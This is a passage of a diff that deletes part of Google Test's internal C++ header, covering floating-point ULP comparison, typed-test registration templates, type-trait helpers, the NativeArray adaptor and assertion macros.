-  explicit GoogleTestFailureException(const TestPartResult& failure);
-};
-
-#endif  // GTEST_HAS_EXCEPTIONS
-
-// A helper class for creating scoped traces in user programs.
-class GTEST_API_ ScopedTrace {
- public:
-  // The c'tor pushes the given source file location and message onto
-  // a trace stack maintained by Google Test.
-  ScopedTrace(const char* file, int line, const Message& message);
-
-  // The d'tor pops the info pushed by the c'tor.
-  //
-  // Note that the d'tor is not virtual in order to be efficient.
-  // Don't inherit from ScopedTrace!
-  ~ScopedTrace();
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ScopedTrace);
-} GTEST_ATTRIBUTE_UNUSED_;  // A ScopedTrace object does its job in its
-                            // c'tor and d'tor.  Therefore it doesn't
-                            // need to be used otherwise.
-
-namespace edit_distance {
-// Returns the optimal edits to go from 'left' to 'right'.
-// All edits cost the same, with replace having lower priority than
-// add/remove.
-// Simple implementation of the Wagner-Fischer algorithm.
-// See http://en.wikipedia.org/wiki/Wagner-Fischer_algorithm
-enum EditType { kMatch, kAdd, kRemove, kReplace };
-GTEST_API_ std::vector<EditType> CalculateOptimalEdits(
-    const std::vector<size_t>& left, const std::vector<size_t>& right);
-
-// Same as above, but the input is represented as strings.
-GTEST_API_ std::vector<EditType> CalculateOptimalEdits(
-    const std::vector<std::string>& left,
-    const std::vector<std::string>& right);
-
-// Create a diff of the input strings in Unified diff format.
-GTEST_API_ std::string CreateUnifiedDiff(const std::vector<std::string>& left,
-                                         const std::vector<std::string>& right,
-                                         size_t context = 2);
-
-}  // namespace edit_distance
-
-// Calculate the diff between 'left' and 'right' and return it in unified diff
-// format.
-// If not null, stores in 'total_line_count' the total number of lines found
-// in left + right.
-GTEST_API_ std::string DiffStrings(const std::string& left,
-                                   const std::string& right,
-                                   size_t* total_line_count);
-
-// Constructs and returns the message for an equality assertion
-// (e.g. ASSERT_EQ, EXPECT_STREQ, etc) failure.
-//
-// The first four parameters are the expressions used in the assertion
-// and their values, as strings.  For example, for ASSERT_EQ(foo, bar)
-// where foo is 5 and bar is 6, we have:
-//
-//   expected_expression: "foo"
-//   actual_expression:   "bar"
-//   expected_value:      "5"
-//   actual_value:        "6"
-//
-// The ignoring_case parameter is true iff the assertion is a
-// *_STRCASEEQ*.  When it's true, the string " (ignoring case)" will
-// be inserted into the message.
-GTEST_API_ AssertionResult EqFailure(const char* expected_expression,
-                                     const char* actual_expression,
-                                     const std::string& expected_value,
-                                     const std::string& actual_value,
-                                     bool ignoring_case);
-
-// Constructs a failure message for Boolean assertions such as EXPECT_TRUE.
-GTEST_API_ std::string GetBoolAssertionFailureMessage(
-    const AssertionResult& assertion_result,
-    const char* expression_text,
-    const char* actual_predicate_value,
-    const char* expected_predicate_value);
-
-// This template class represents an IEEE floating-point number
-// (either single-precision or double-precision, depending on the
-// template parameters).
-//
-// The purpose of this class is to do more sophisticated number
-// comparison.  (Due to round-off error, etc, it's very unlikely that
-// two floating-points will be equal exactly.  Hence a naive
-// comparison by the == operation often doesn't work.)
-//
-// Format of IEEE floating-point:
-//
-//   The most-significant bit being the leftmost, an IEEE
-//   floating-point looks like
-//
-//     sign_bit exponent_bits fraction_bits
-//
-//   Here, sign_bit is a single bit that designates the sign of the
-//   number.
-//
-//   For float, there are 8 exponent bits and 23 fraction bits.
-//
-//   For double, there are 11 exponent bits and 52 fraction bits.
-//
-//   More details can be found at
-//   http://en.wikipedia.org/wiki/IEEE_floating-point_standard.
-//
-// Template parameter:
-//
-//   RawType: the raw floating-point type (either float or double)
-template <typename RawType>
-class FloatingPoint {
- public:
-  // Defines the unsigned integer type that has the same size as the
-  // floating point number.
-  typedef typename TypeWithSize<sizeof(RawType)>::UInt Bits;
-
-  // Constants.
-
-  // # of bits in a number.
-  static const size_t kBitCount = 8*sizeof(RawType);
-
-  // # of fraction bits in a number.
-  static const size_t kFractionBitCount =
-    std::numeric_limits<RawType>::digits - 1;
-
-  // # of exponent bits in a number.
-  static const size_t kExponentBitCount = kBitCount - 1 - kFractionBitCount;
-
-  // The mask for the sign bit.
-  static const Bits kSignBitMask = static_cast<Bits>(1) << (kBitCount - 1);
-
-  // The mask for the fraction bits.
-  static const Bits kFractionBitMask =
-    ~static_cast<Bits>(0) >> (kExponentBitCount + 1);
-
-  // The mask for the exponent bits.
-  static const Bits kExponentBitMask = ~(kSignBitMask | kFractionBitMask);
-
-  // How many ULP's (Units in the Last Place) we want to tolerate when
-  // comparing two numbers.  The larger the value, the more error we
-  // allow.  A 0 value means that two numbers must be exactly the same
-  // to be considered equal.
-  //
-  // The maximum error of a single floating-point operation is 0.5
-  // units in the last place.  On Intel CPU's, all floating-point
-  // calculations are done with 80-bit precision, while double has 64
-  // bits.  Therefore, 4 should be enough for ordinary use.
-  //
-  // See the following article for more details on ULP:
-  // http://randomascii.wordpress.com/2012/02/25/comparing-floating-point-numbers-2012-edition/
-  static const size_t kMaxUlps = 4;
-
-  // Constructs a FloatingPoint from a raw floating-point number.
-  //
-  // On an Intel CPU, passing a non-normalized NAN (Not a Number)
-  // around may change its bits, although the new value is guaranteed
-  // to be also a NAN.  Therefore, don't expect this constructor to
-  // preserve the bits in x when x is a NAN.
-  explicit FloatingPoint(const RawType& x) { u_.value_ = x; }
-
-  // Static methods
-
-  // Reinterprets a bit pattern as a floating-point number.
-  //
-  // This function is needed to test the AlmostEquals() method.
-  static RawType ReinterpretBits(const Bits bits) {
-    FloatingPoint fp(0);
-    fp.u_.bits_ = bits;
-    return fp.u_.value_;
-  }
-
-  // Returns the floating-point number that represent positive infinity.
-  static RawType Infinity() {
-    return ReinterpretBits(kExponentBitMask);
-  }
-
-  // Returns the maximum representable finite floating-point number.
-  static RawType Max();
-
-  // Non-static methods
-
-  // Returns the bits that represents this number.
-  const Bits &bits() const { return u_.bits_; }
-
-  // Returns the exponent bits of this number.
-  Bits exponent_bits() const { return kExponentBitMask & u_.bits_; }
-
-  // Returns the fraction bits of this number.
-  Bits fraction_bits() const { return kFractionBitMask & u_.bits_; }
-
-  // Returns the sign bit of this number.
-  Bits sign_bit() const { return kSignBitMask & u_.bits_; }
-
-  // Returns true iff this is NAN (not a number).
-  bool is_nan() const {
-    // It's a NAN if the exponent bits are all ones and the fraction
-    // bits are not entirely zeros.
-    return (exponent_bits() == kExponentBitMask) && (fraction_bits() != 0);
-  }
-
-  // Returns true iff this number is at most kMaxUlps ULP's away from
-  // rhs.  In particular, this function:
-  //
-  //   - returns false if either number is (or both are) NAN.
-  //   - treats really large numbers as almost equal to infinity.
-  //   - thinks +0.0 and -0.0 are 0 DLP's apart.
-  bool AlmostEquals(const FloatingPoint& rhs) const {
-    // The IEEE standard says that any comparison operation involving
-    // a NAN must return false.
-    if (is_nan() || rhs.is_nan()) return false;
-
-    return DistanceBetweenSignAndMagnitudeNumbers(u_.bits_, rhs.u_.bits_)
-        <= kMaxUlps;
-  }
-
- private:
-  // The data type used to store the actual floating-point number.
-  union FloatingPointUnion {
-    RawType value_;  // The raw floating-point number.
-    Bits bits_;      // The bits that represent the number.
-  };
-
-  // Converts an integer from the sign-and-magnitude representation to
-  // the biased representation.  More precisely, let N be 2 to the
-  // power of (kBitCount - 1), an integer x is represented by the
-  // unsigned number x + N.
-  //
-  // For instance,
-  //
-  //   -N + 1 (the most negative number representable using
-  //          sign-and-magnitude) is represented by 1;
-  //   0      is represented by N; and
-  //   N - 1  (the biggest number representable using
-  //          sign-and-magnitude) is represented by 2N - 1.
-  //
-  // Read http://en.wikipedia.org/wiki/Signed_number_representations
-  // for more details on signed number representations.
-  static Bits SignAndMagnitudeToBiased(const Bits &sam) {
-    if (kSignBitMask & sam) {
-      // sam represents a negative number.
-      return ~sam + 1;
-    } else {
-      // sam represents a positive number.
-      return kSignBitMask | sam;
-    }
-  }
-
-  // Given two numbers in the sign-and-magnitude representation,
-  // returns the distance between them as an unsigned number.
-  static Bits DistanceBetweenSignAndMagnitudeNumbers(const Bits &sam1,
-                                                     const Bits &sam2) {
-    const Bits biased1 = SignAndMagnitudeToBiased(sam1);
-    const Bits biased2 = SignAndMagnitudeToBiased(sam2);
-    return (biased1 >= biased2) ? (biased1 - biased2) : (biased2 - biased1);
-  }
-
-  FloatingPointUnion u_;
-};
-
-// We cannot use std::numeric_limits<T>::max() as it clashes with the max()
-// macro defined by <windows.h>.
-template <>
-inline float FloatingPoint<float>::Max() { return FLT_MAX; }
-template <>
-inline double FloatingPoint<double>::Max() { return DBL_MAX; }
-
-// Typedefs the instances of the FloatingPoint template class that we
-// care to use.
-typedef FloatingPoint<float> Float;
-typedef FloatingPoint<double> Double;
-
-// In order to catch the mistake of putting tests that use different
-// test fixture classes in the same test case, we need to assign
-// unique IDs to fixture classes and compare them.  The TypeId type is
-// used to hold such IDs.  The user should treat TypeId as an opaque
-// type: the only operation allowed on TypeId values is to compare
-// them for equality using the == operator.
-typedef const void* TypeId;
-
-template <typename T>
-class TypeIdHelper {
- public:
-  // dummy_ must not have a const type.  Otherwise an overly eager
-  // compiler (e.g. MSVC 7.1 & 8.0) may try to merge
-  // TypeIdHelper<T>::dummy_ for different Ts as an "optimization".
-  static bool dummy_;
-};
-
-template <typename T>
-bool TypeIdHelper<T>::dummy_ = false;
-
-// GetTypeId<T>() returns the ID of type T.  Different values will be
-// returned for different types.  Calling the function twice with the
-// same type argument is guaranteed to return the same ID.
-template <typename T>
-TypeId GetTypeId() {
-  // The compiler is required to allocate a different
-  // TypeIdHelper<T>::dummy_ variable for each T used to instantiate
-  // the template.  Therefore, the address of dummy_ is guaranteed to
-  // be unique.
-  return &(TypeIdHelper<T>::dummy_);
-}
-
-// Returns the type ID of ::testing::Test.  Always call this instead
-// of GetTypeId< ::testing::Test>() to get the type ID of
-// ::testing::Test, as the latter may give the wrong result due to a
-// suspected linker bug when compiling Google Test as a Mac OS X
-// framework.
-GTEST_API_ TypeId GetTestTypeId();
-
-// Defines the abstract factory interface that creates instances
-// of a Test object.
-class TestFactoryBase {
- public:
-  virtual ~TestFactoryBase() {}
-
-  // Creates a test instance to run. The instance is both created and destroyed
-  // within TestInfoImpl::Run()
-  virtual Test* CreateTest() = 0;
-
- protected:
-  TestFactoryBase() {}
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestFactoryBase);
-};
-
-// This class provides implementation of TeastFactoryBase interface.
-// It is used in TEST and TEST_F macros.
-template <class TestClass>
-class TestFactoryImpl : public TestFactoryBase {
- public:
-  virtual Test* CreateTest() { return new TestClass; }
-};
-
-#if GTEST_OS_WINDOWS
-
-// Predicate-formatters for implementing the HRESULT checking macros
-// {ASSERT|EXPECT}_HRESULT_{SUCCEEDED|FAILED}
-// We pass a long instead of HRESULT to avoid causing an
-// include dependency for the HRESULT type.
-GTEST_API_ AssertionResult IsHRESULTSuccess(const char* expr,
-                                            long hr);  // NOLINT
-GTEST_API_ AssertionResult IsHRESULTFailure(const char* expr,
-                                            long hr);  // NOLINT
-
-#endif  // GTEST_OS_WINDOWS
-
-// Types of SetUpTestCase() and TearDownTestCase() functions.
-typedef void (*SetUpTestCaseFunc)();
-typedef void (*TearDownTestCaseFunc)();
-
-// Creates a new TestInfo object and registers it with Google Test;
-// returns the created object.
-//
-// Arguments:
-//
-//   test_case_name:   name of the test case
-//   name:             name of the test
-//   type_param        the name of the test's type parameter, or NULL if
-//                     this is not a typed or a type-parameterized test.
-//   value_param       text representation of the test's value parameter,
-//                     or NULL if this is not a type-parameterized test.
-//   fixture_class_id: ID of the test fixture class
-//   set_up_tc:        pointer to the function that sets up the test case
-//   tear_down_tc:     pointer to the function that tears down the test case
-//   factory:          pointer to the factory that creates a test object.
-//                     The newly created TestInfo instance will assume
-//                     ownership of the factory object.
-GTEST_API_ TestInfo* MakeAndRegisterTestInfo(
-    const char* test_case_name,
-    const char* name,
-    const char* type_param,
-    const char* value_param,
-    TypeId fixture_class_id,
-    SetUpTestCaseFunc set_up_tc,
-    TearDownTestCaseFunc tear_down_tc,
-    TestFactoryBase* factory);
-
-// If *pstr starts with the given prefix, modifies *pstr to be right
-// past the prefix and returns true; otherwise leaves *pstr unchanged
-// and returns false.  None of pstr, *pstr, and prefix can be NULL.
-GTEST_API_ bool SkipPrefix(const char* prefix, const char** pstr);
-
-#if GTEST_HAS_TYPED_TEST || GTEST_HAS_TYPED_TEST_P
-
-// State of the definition of a type-parameterized test case.
-class GTEST_API_ TypedTestCasePState {
- public:
-  TypedTestCasePState() : registered_(false) {}
-
-  // Adds the given test name to defined_test_names_ and return true
-  // if the test case hasn't been registered; otherwise aborts the
-  // program.
-  bool AddTestName(const char* file, int line, const char* case_name,
-                   const char* test_name) {
-    if (registered_) {
-      fprintf(stderr, "%s Test %s must be defined before "
-              "REGISTER_TYPED_TEST_CASE_P(%s, ...).\n",
-              FormatFileLocation(file, line).c_str(), test_name, case_name);
-      fflush(stderr);
-      posix::Abort();
-    }
-    defined_test_names_.insert(test_name);
-    return true;
-  }
-
-  // Verifies that registered_tests match the test names in
-  // defined_test_names_; returns registered_tests if successful, or
-  // aborts the program otherwise.
-  const char* VerifyRegisteredTestNames(
-      const char* file, int line, const char* registered_tests);
-
- private:
-  bool registered_;
-  ::std::set<const char*> defined_test_names_;
-};
-
-// Skips to the first non-space char after the first comma in 'str';
-// returns NULL if no comma is found in 'str'.
-inline const char* SkipComma(const char* str) {
-  const char* comma = strchr(str, ',');
-  if (comma == NULL) {
-    return NULL;
-  }
-  while (IsSpace(*(++comma))) {}
-  return comma;
-}
-
-// Returns the prefix of 'str' before the first comma in it; returns
-// the entire string if it contains no comma.
-inline std::string GetPrefixUntilComma(const char* str) {
-  const char* comma = strchr(str, ',');
-  return comma == NULL ? str : std::string(str, comma);
-}
-
-// TypeParameterizedTest<Fixture, TestSel, Types>::Register()
-// registers a list of type-parameterized tests with Google Test.  The
-// return value is insignificant - we just need to return something
-// such that we can call this function in a namespace scope.
-//
-// Implementation note: The GTEST_TEMPLATE_ macro declares a template
-// template parameter.  It's defined in gtest-type-util.h.
-template <GTEST_TEMPLATE_ Fixture, class TestSel, typename Types>
-class TypeParameterizedTest {
- public:
-  // 'index' is the index of the test in the type list 'Types'
-  // specified in INSTANTIATE_TYPED_TEST_CASE_P(Prefix, TestCase,
-  // Types).  Valid values for 'index' are [0, N - 1] where N is the
-  // length of Types.
-  static bool Register(const char* prefix, const char* case_name,
-                       const char* test_names, int index) {
-    typedef typename Types::Head Type;
-    typedef Fixture<Type> FixtureClass;
-    typedef typename GTEST_BIND_(TestSel, Type) TestClass;
-
-    // First, registers the first type-parameterized test in the type
-    // list.
-    MakeAndRegisterTestInfo(
-        (std::string(prefix) + (prefix[0] == '\0' ? "" : "/") + case_name + "/"
-         + StreamableToString(index)).c_str(),
-        StripTrailingSpaces(GetPrefixUntilComma(test_names)).c_str(),
-        GetTypeName<Type>().c_str(),
-        NULL,  // No value parameter.
-        GetTypeId<FixtureClass>(),
-        TestClass::SetUpTestCase,
-        TestClass::TearDownTestCase,
-        new TestFactoryImpl<TestClass>);
-
-    // Next, recurses (at compile time) with the tail of the type list.
-    return TypeParameterizedTest<Fixture, TestSel, typename Types::Tail>
-        ::Register(prefix, case_name, test_names, index + 1);
-  }
-};
-
-// The base case for the compile time recursion.
-template <GTEST_TEMPLATE_ Fixture, class TestSel>
-class TypeParameterizedTest<Fixture, TestSel, Types0> {
- public:
-  static bool Register(const char* /*prefix*/, const char* /*case_name*/,
-                       const char* /*test_names*/, int /*index*/) {
-    return true;
-  }
-};
-
-// TypeParameterizedTestCase<Fixture, Tests, Types>::Register()
-// registers *all combinations* of 'Tests' and 'Types' with Google
-// Test.  The return value is insignificant - we just need to return
-// something such that we can call this function in a namespace scope.
-template <GTEST_TEMPLATE_ Fixture, typename Tests, typename Types>
-class TypeParameterizedTestCase {
- public:
-  static bool Register(const char* prefix, const char* case_name,
-                       const char* test_names) {
-    typedef typename Tests::Head Head;
-
-    // First, register the first test in 'Test' for each type in 'Types'.
-    TypeParameterizedTest<Fixture, Head, Types>::Register(
-        prefix, case_name, test_names, 0);
-
-    // Next, recurses (at compile time) with the tail of the test list.
-    return TypeParameterizedTestCase<Fixture, typename Tests::Tail, Types>
-        ::Register(prefix, case_name, SkipComma(test_names));
-  }
-};
-
-// The base case for the compile time recursion.
-template <GTEST_TEMPLATE_ Fixture, typename Types>
-class TypeParameterizedTestCase<Fixture, Templates0, Types> {
- public:
-  static bool Register(const char* /*prefix*/, const char* /*case_name*/,
-                       const char* /*test_names*/) {
-    return true;
-  }
-};
-
-#endif  // GTEST_HAS_TYPED_TEST || GTEST_HAS_TYPED_TEST_P
-
-// Returns the current OS stack trace as an std::string.
-//
-// The maximum number of stack frames to be included is specified by
-// the gtest_stack_trace_depth flag.  The skip_count parameter
-// specifies the number of top frames to be skipped, which doesn't
-// count against the number of frames to be included.
-//
-// For example, if Foo() calls Bar(), which in turn calls
-// GetCurrentOsStackTraceExceptTop(..., 1), Foo() will be included in
-// the trace but Bar() and GetCurrentOsStackTraceExceptTop() won't.
-GTEST_API_ std::string GetCurrentOsStackTraceExceptTop(
-    UnitTest* unit_test, int skip_count);
-
-// Helpers for suppressing warnings on unreachable code or constant
-// condition.
-
-// Always returns true.
-GTEST_API_ bool AlwaysTrue();
-
-// Always returns false.
-inline bool AlwaysFalse() { return !AlwaysTrue(); }
-
-// Helper for suppressing false warning from Clang on a const char*
-// variable declared in a conditional expression always being NULL in
-// the else branch.
-struct GTEST_API_ ConstCharPtr {
-  ConstCharPtr(const char* str) : value(str) {}
-  operator bool() const { return true; }
-  const char* value;
-};
-
-// A simple Linear Congruential Generator for generating random
-// numbers with a uniform distribution.  Unlike rand() and srand(), it
-// doesn't use global state (and therefore can't interfere with user
-// code).  Unlike rand_r(), it's portable.  An LCG isn't very random,
-// but it's good enough for our purposes.
-class GTEST_API_ Random {
- public:
-  static const UInt32 kMaxRange = 1u << 31;
-
-  explicit Random(UInt32 seed) : state_(seed) {}
-
-  void Reseed(UInt32 seed) { state_ = seed; }
-
-  // Generates a random number from [0, range).  Crashes if 'range' is
-  // 0 or greater than kMaxRange.
-  UInt32 Generate(UInt32 range);
-
- private:
-  UInt32 state_;
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Random);
-};
-
-// Defining a variable of type CompileAssertTypesEqual<T1, T2> will cause a
-// compiler error iff T1 and T2 are different types.
-template <typename T1, typename T2>
-struct CompileAssertTypesEqual;
-
-template <typename T>
-struct CompileAssertTypesEqual<T, T> {
-};
-
-// Removes the reference from a type if it is a reference type,
-// otherwise leaves it unchanged.  This is the same as
-// tr1::remove_reference, which is not widely available yet.
-template <typename T>
-struct RemoveReference { typedef T type; };  // NOLINT
-template <typename T>
-struct RemoveReference<T&> { typedef T type; };  // NOLINT
-
-// A handy wrapper around RemoveReference that works when the argument
-// T depends on template parameters.
-#define GTEST_REMOVE_REFERENCE_(T) \
-    typename ::testing::internal::RemoveReference<T>::type
-
-// Removes const from a type if it is a const type, otherwise leaves
-// it unchanged.  This is the same as tr1::remove_const, which is not
-// widely available yet.
-template <typename T>
-struct RemoveConst { typedef T type; };  // NOLINT
-template <typename T>
-struct RemoveConst<const T> { typedef T type; };  // NOLINT
-
-// MSVC 8.0, Sun C++, and IBM XL C++ have a bug which causes the above
-// definition to fail to remove the const in 'const int[3]' and 'const
-// char[3][4]'.  The following specialization works around the bug.
-template <typename T, size_t N>
-struct RemoveConst<const T[N]> {
-  typedef typename RemoveConst<T>::type type[N];
-};
-
-#if defined(_MSC_VER) && _MSC_VER < 1400
-// This is the only specialization that allows VC++ 7.1 to remove const in
-// 'const int[3] and 'const int[3][4]'.  However, it causes trouble with GCC
-// and thus needs to be conditionally compiled.
-template <typename T, size_t N>
-struct RemoveConst<T[N]> {
-  typedef typename RemoveConst<T>::type type[N];
-};
-#endif
-
-// A handy wrapper around RemoveConst that works when the argument
-// T depends on template parameters.
-#define GTEST_REMOVE_CONST_(T) \
-    typename ::testing::internal::RemoveConst<T>::type
-
-// Turns const U&, U&, const U, and U all into U.
-#define GTEST_REMOVE_REFERENCE_AND_CONST_(T) \
-    GTEST_REMOVE_CONST_(GTEST_REMOVE_REFERENCE_(T))
-
-// Adds reference to a type if it is not a reference type,
-// otherwise leaves it unchanged.  This is the same as
-// tr1::add_reference, which is not widely available yet.
-template <typename T>
-struct AddReference { typedef T& type; };  // NOLINT
-template <typename T>
-struct AddReference<T&> { typedef T& type; };  // NOLINT
-
-// A handy wrapper around AddReference that works when the argument T
-// depends on template parameters.
-#define GTEST_ADD_REFERENCE_(T) \
-    typename ::testing::internal::AddReference<T>::type
-
-// Adds a reference to const on top of T as necessary.  For example,
-// it transforms
-//
-//   char         ==> const char&
-//   const char   ==> const char&
-//   char&        ==> const char&
-//   const char&  ==> const char&
-//
-// The argument T must depend on some template parameters.
-#define GTEST_REFERENCE_TO_CONST_(T) \
-    GTEST_ADD_REFERENCE_(const GTEST_REMOVE_REFERENCE_(T))
-
-// ImplicitlyConvertible<From, To>::value is a compile-time bool
-// constant that's true iff type From can be implicitly converted to
-// type To.
-template <typename From, typename To>
-class ImplicitlyConvertible {
- private:
-  // We need the following helper functions only for their types.
-  // They have no implementations.
-
-  // MakeFrom() is an expression whose type is From.  We cannot simply
-  // use From(), as the type From may not have a public default
-  // constructor.
-  static typename AddReference<From>::type MakeFrom();
-
-  // These two functions are overloaded.  Given an expression
-  // Helper(x), the compiler will pick the first version if x can be
-  // implicitly converted to type To; otherwise it will pick the
-  // second version.
-  //
-  // The first version returns a value of size 1, and the second
-  // version returns a value of size 2.  Therefore, by checking the
-  // size of Helper(x), which can be done at compile time, we can tell
-  // which version of Helper() is used, and hence whether x can be
-  // implicitly converted to type To.
-  static char Helper(To);
-  static char (&Helper(...))[2];  // NOLINT
-
-  // We have to put the 'public' section after the 'private' section,
-  // or MSVC refuses to compile the code.
- public:
-#if defined(__BORLANDC__)
-  // C++Builder cannot use member overload resolution during template
-  // instantiation.  The simplest workaround is to use its C++0x type traits
-  // functions (C++Builder 2009 and above only).
-  static const bool value = __is_convertible(From, To);
-#else
-  // MSVC warns about implicitly converting from double to int for
-  // possible loss of data, so we need to temporarily disable the
-  // warning.
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4244)
-  static const bool value =
-      sizeof(Helper(ImplicitlyConvertible::MakeFrom())) == 1;
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-#endif  // __BORLANDC__
-};
-template <typename From, typename To>
-const bool ImplicitlyConvertible<From, To>::value;
-
-// IsAProtocolMessage<T>::value is a compile-time bool constant that's
-// true iff T is type ProtocolMessage, proto2::Message, or a subclass
-// of those.
-template <typename T>
-struct IsAProtocolMessage
-    : public bool_constant<
-  ImplicitlyConvertible<const T*, const ::ProtocolMessage*>::value ||
-  ImplicitlyConvertible<const T*, const ::proto2::Message*>::value> {
-};
-
-// When the compiler sees expression IsContainerTest<C>(0), if C is an
-// STL-style container class, the first overload of IsContainerTest
-// will be viable (since both C::iterator* and C::const_iterator* are
-// valid types and NULL can be implicitly converted to them).  It will
-// be picked over the second overload as 'int' is a perfect match for
-// the type of argument 0.  If C::iterator or C::const_iterator is not
-// a valid type, the first overload is not viable, and the second
-// overload will be picked.  Therefore, we can determine whether C is
-// a container class by checking the type of IsContainerTest<C>(0).
-// The value of the expression is insignificant.
-//
-// Note that we look for both C::iterator and C::const_iterator.  The
-// reason is that C++ injects the name of a class as a member of the
-// class itself (e.g. you can refer to class iterator as either
-// 'iterator' or 'iterator::iterator').  If we look for C::iterator
-// only, for example, we would mistakenly think that a class named
-// iterator is an STL container.
-//
-// Also note that the simpler approach of overloading
-// IsContainerTest(typename C::const_iterator*) and
-// IsContainerTest(...) doesn't work with Visual Age C++ and Sun C++.
-typedef int IsContainer;
-template <class C>
-IsContainer IsContainerTest(int /* dummy */,
-                            typename C::iterator* /* it */ = NULL,
-                            typename C::const_iterator* /* const_it */ = NULL) {
-  return 0;
-}
-
-typedef char IsNotContainer;
-template <class C>
-IsNotContainer IsContainerTest(long /* dummy */) { return '\0'; }
-
-// EnableIf<condition>::type is void when 'Cond' is true, and
-// undefined when 'Cond' is false.  To use SFINAE to make a function
-// overload only apply when a particular expression is true, add
-// "typename EnableIf<expression>::type* = 0" as the last parameter.
-template<bool> struct EnableIf;
-template<> struct EnableIf<true> { typedef void type; };  // NOLINT
-
-// Utilities for native arrays.
-
-// ArrayEq() compares two k-dimensional native arrays using the
-// elements' operator==, where k can be any integer >= 0.  When k is
-// 0, ArrayEq() degenerates into comparing a single pair of values.
-
-template <typename T, typename U>
-bool ArrayEq(const T* lhs, size_t size, const U* rhs);
-
-// This generic version is used when k is 0.
-template <typename T, typename U>
-inline bool ArrayEq(const T& lhs, const U& rhs) { return lhs == rhs; }
-
-// This overload is used when k >= 1.
-template <typename T, typename U, size_t N>
-inline bool ArrayEq(const T(&lhs)[N], const U(&rhs)[N]) {
-  return internal::ArrayEq(lhs, N, rhs);
-}
-
-// This helper reduces code bloat.  If we instead put its logic inside
-// the previous ArrayEq() function, arrays with different sizes would
-// lead to different copies of the template code.
-template <typename T, typename U>
-bool ArrayEq(const T* lhs, size_t size, const U* rhs) {
-  for (size_t i = 0; i != size; i++) {
-    if (!internal::ArrayEq(lhs[i], rhs[i]))
-      return false;
-  }
-  return true;
-}
-
-// Finds the first element in the iterator range [begin, end) that
-// equals elem.  Element may be a native array type itself.
-template <typename Iter, typename Element>
-Iter ArrayAwareFind(Iter begin, Iter end, const Element& elem) {
-  for (Iter it = begin; it != end; ++it) {
-    if (internal::ArrayEq(*it, elem))
-      return it;
-  }
-  return end;
-}
-
-// CopyArray() copies a k-dimensional native array using the elements'
-// operator=, where k can be any integer >= 0.  When k is 0,
-// CopyArray() degenerates into copying a single value.
-
-template <typename T, typename U>
-void CopyArray(const T* from, size_t size, U* to);
-
-// This generic version is used when k is 0.
-template <typename T, typename U>
-inline void CopyArray(const T& from, U* to) { *to = from; }
-
-// This overload is used when k >= 1.
-template <typename T, typename U, size_t N>
-inline void CopyArray(const T(&from)[N], U(*to)[N]) {
-  internal::CopyArray(from, N, *to);
-}
-
-// This helper reduces code bloat.  If we instead put its logic inside
-// the previous CopyArray() function, arrays with different sizes
-// would lead to different copies of the template code.
-template <typename T, typename U>
-void CopyArray(const T* from, size_t size, U* to) {
-  for (size_t i = 0; i != size; i++) {
-    internal::CopyArray(from[i], to + i);
-  }
-}
-
-// The relation between an NativeArray object (see below) and the
-// native array it represents.
-// We use 2 different structs to allow non-copyable types to be used, as long
-// as RelationToSourceReference() is passed.
-struct RelationToSourceReference {};
-struct RelationToSourceCopy {};
-
-// Adapts a native array to a read-only STL-style container.  Instead
-// of the complete STL container concept, this adaptor only implements
-// members useful for Google Mock's container matchers.  New members
-// should be added as needed.  To simplify the implementation, we only
-// support Element being a raw type (i.e. having no top-level const or
-// reference modifier).  It's the client's responsibility to satisfy
-// this requirement.  Element can be an array type itself (hence
-// multi-dimensional arrays are supported).
-template <typename Element>
-class NativeArray {
- public:
-  // STL-style container typedefs.
-  typedef Element value_type;
-  typedef Element* iterator;
-  typedef const Element* const_iterator;
-
-  // Constructs from a native array. References the source.
-  NativeArray(const Element* array, size_t count, RelationToSourceReference) {
-    InitRef(array, count);
-  }
-
-  // Constructs from a native array. Copies the source.
-  NativeArray(const Element* array, size_t count, RelationToSourceCopy) {
-    InitCopy(array, count);
-  }
-
-  // Copy constructor.
-  NativeArray(const NativeArray& rhs) {
-    (this->*rhs.clone_)(rhs.array_, rhs.size_);
-  }
-
-  ~NativeArray() {
-    if (clone_ != &NativeArray::InitRef)
-      delete[] array_;
-  }
-
-  // STL-style container methods.
-  size_t size() const { return size_; }
-  const_iterator begin() const { return array_; }
-  const_iterator end() const { return array_ + size_; }
-  bool operator==(const NativeArray& rhs) const {
-    return size() == rhs.size() &&
-        ArrayEq(begin(), size(), rhs.begin());
-  }
-
- private:
-  enum {
-    kCheckTypeIsNotConstOrAReference = StaticAssertTypeEqHelper<
-        Element, GTEST_REMOVE_REFERENCE_AND_CONST_(Element)>::value,
-  };
-
-  // Initializes this object with a copy of the input.
-  void InitCopy(const Element* array, size_t a_size) {
-    Element* const copy = new Element[a_size];
-    CopyArray(array, a_size, copy);
-    array_ = copy;
-    size_ = a_size;
-    clone_ = &NativeArray::InitCopy;
-  }
-
-  // Initializes this object with a reference of the input.
-  void InitRef(const Element* array, size_t a_size) {
-    array_ = array;
-    size_ = a_size;
-    clone_ = &NativeArray::InitRef;
-  }
-
-  const Element* array_;
-  size_t size_;
-  void (NativeArray::*clone_)(const Element*, size_t);
-
-  GTEST_DISALLOW_ASSIGN_(NativeArray);
-};
-
-}  // namespace internal
-}  // namespace testing
-
-#define GTEST_MESSAGE_AT_(file, line, message, result_type) \
-  ::testing::internal::AssertHelper(result_type, file, line, message) \
-    = ::testing::Message()
-
-#define GTEST_MESSAGE_(message, result_type) \
-  GTEST_MESSAGE_AT_(__FILE__, __LINE__, message, result_type)
-
-#define GTEST_FATAL_FAILURE_(message) \
-  return GTEST_MESSAGE_(message, ::testing::TestPartResult::kFatalFailure)
-
-#define GTEST_NONFATAL_FAILURE_(message) \
-  GTEST_MESSAGE_(message, ::testing::TestPartResult::kNonFatalFailure)
-
-#define GTEST_SUCCESS_(message) \
-  GTEST_MESSAGE_(message, ::testing::TestPartResult::kSuccess)
-
-// Suppresses MSVC warnings 4072 (unreachable code) for the code following
-// statement if it returns or throws (or doesn't return or throw in some
-// situations).
-#define GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement) \
-  if (::testing::internal::AlwaysTrue()) { statement; }
-
-#define GTEST_TEST_THROW_(statement, expected_exception, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::ConstCharPtr gtest_msg = "") { \
